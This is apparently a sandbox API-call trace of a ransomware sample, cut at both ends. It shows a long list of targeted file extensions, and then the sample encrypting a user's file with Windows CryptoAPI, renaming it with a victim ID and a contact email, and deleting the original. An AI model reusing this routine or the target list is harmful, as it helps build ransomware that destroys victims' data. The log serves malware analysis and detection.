xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0182.811] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0182.812] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0182.812] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\22_uir_zgnsods5-vj.wav" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\22_uir_zgnsods5-vj.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0182.816] ReadFile (in: hFile=0x388, lpBuffer=0xfdd180, nNumberOfBytesToRead=0x16146, lpNumberOfBytesRead=0x18b350, lpOverlapped=0x0 | out: lpBuffer=0xfdd180*, lpNumberOfBytesRead=0x18b350*=0x16146, lpOverlapped=0x0) returned 1
	[0182.818] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0182.818] CryptAcquireContextW (in: phProv=0x18af00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18af00*=0xfcb5d8) returned 1
	[0182.819] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0182.820] CryptCreateHash (in: hProv=0xfcb5d8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18af04 | out: phHash=0x18af04) returned 1
	[0182.820] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0182.820] CryptHashData (hHash=0xfb9b30, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0182.820] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0182.820] CryptDeriveKey (in: hProv=0xfcb5d8, Algid=0x6610, hBaseData=0xfb9b30, dwFlags=0x1, phKey=0x18af08 | out: phKey=0x18af08*=0xfb9430) returned 1
	[0182.820] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0182.820] CryptEncrypt (in: hKey=0xfb9430, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18af1c*=0x16146, dwBufLen=0x16146 | out: pbData=0x0*, pdwDataLen=0x18af1c*=0x16150) returned 1
	[0182.822] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0182.823] RtlMoveMemory (in: Destination=0xff32d0, Source=0xfdd180, Length=0x16146 | out: Destination=0xff32d0) 
	[0182.823] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0182.823] CryptEncrypt (in: hKey=0xfb9430, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xff32d0*, pdwDataLen=0x18aefc*=0x16146, dwBufLen=0x16150 | out: pbData=0xff32d0*, pdwDataLen=0x18aefc*=0x16150) returned 1
	[0182.824] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0182.824] CryptDestroyKey (hKey=0xfb9430) returned 1
	[0182.824] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0182.825] CryptDestroyHash (hHash=0xfb9b30) returned 1
	[0182.825] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0182.825] CryptReleaseContext (hProv=0xfcb5d8, dwFlags=0x0) returned 1
	[0182.825] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0182.825] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18af18, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18af18*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0182.826] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0182.826] GetUserNameA (in: lpBuffer=0x18adfc, pcbBuffer=0x18af14 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18af14) returned 1
	[0182.827] wsprintfW (in: param_1=0x18af30, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\22_uir_zgnsods5-vj.wav.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 107
	[0182.827] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\22_uir_zgnsods5-vj.wav.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\22_uir_zgnsods5-vj.wav.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0182.842] WriteFile (in: hFile=0x390, lpBuffer=0xff32d0*, nNumberOfBytesToWrite=0x16150, lpNumberOfBytesWritten=0x18b358, lpOverlapped=0x0 | out: lpBuffer=0xff32d0*, lpNumberOfBytesWritten=0x18b358*=0x16150, lpOverlapped=0x0) returned 1
	[0182.846] CloseHandle (hObject=0x390) returned 1
	[0182.846] CloseHandle (hObject=0x388) returned 1
	[0182.846] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\22_uir_zgnsods5-vj.wav" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\22_uir_zgnsods5-vj.wav")) returned 1
	[0182.854] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\22_uir_zgnsods5-vj.wav" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\22_uir_zgnsods5-vj.wav")) returned 0
	[0182.854] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x39d658f0, ftCreationTime.dwHighDateTime=0x1d975a6, ftLastAccessTime.dwLowDateTime=0xb49e42c0, ftLastAccessTime.dwHighDateTime=0x1d97667, ftLastWriteTime.dwLowDateTime=0xb49e42c0, ftLastWriteTime.dwHighDateTime=0x1d97667, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="UXZZ", cAlternateFileName="")) returned 1
	[0182.854] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x21887850, ftCreationTime.dwHighDateTime=0x1d96ce6, ftLastAccessTime.dwLowDateTime=0x56a925f0, ftLastAccessTime.dwHighDateTime=0x1d96e82, ftLastWriteTime.dwLowDateTime=0x56a925f0, ftLastWriteTime.dwHighDateTime=0x1d96e82, nFileSizeHigh=0x0, nFileSizeLow=0x3ba5, dwReserved0=0x0, dwReserved1=0x0, cFileName="yipZjstUVO.m4a", cAlternateFileName="YIPZJS~1.M4A")) returned 1
	[0182.855] lstrcmpW (lpString1="yipZjstUVO.m4a", lpString2="..") returned 1
	[0182.855] lstrcmpW (lpString1="yipZjstUVO.m4a", lpString2=".") returned 1
	[0182.855] lstrcpyW (in: lpString1=0x18bdf4, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BeYl_s9Ay -D\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BeYl_s9Ay -D\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BeYl_s9Ay -D\\"
	[0182.855] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BeYl_s9Ay -D\\", lpString2="yipZjstUVO.m4a" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BeYl_s9Ay -D\\yipZjstUVO.m4a") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BeYl_s9Ay -D\\yipZjstUVO.m4a"
	[0182.855] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BeYl_s9Ay -D\\yipZjstUVO.m4a") returned 57
	[0182.855] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0182.855] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BeYl_s9Ay -D\\yipZjstUVO.m4a", cchLength=0x39 | out: lpsz="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\yipzjstuvo.m4a") returned 0x39
	[0182.855] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0182.856] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\yipzjstuvo.m4a", lpSrch="help_decrypt_your_files") returned 0x0
	[0182.856] lstrcpyW (in: lpString1=0x18b99c, lpString2="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\yipzjstuvo.m4a" | out: lpString1="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\yipzjstuvo.m4a") returned="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\yipzjstuvo.m4a"
	[0182.856] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\yipzjstuvo.m4a") returned 57
	[0182.856] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0182.856] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0182.856] StrStrW (lpFirst=".m4a", lpSrch=".") returned=".m4a"
	[0182.857] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0182.857] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".m4a") returned=".m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota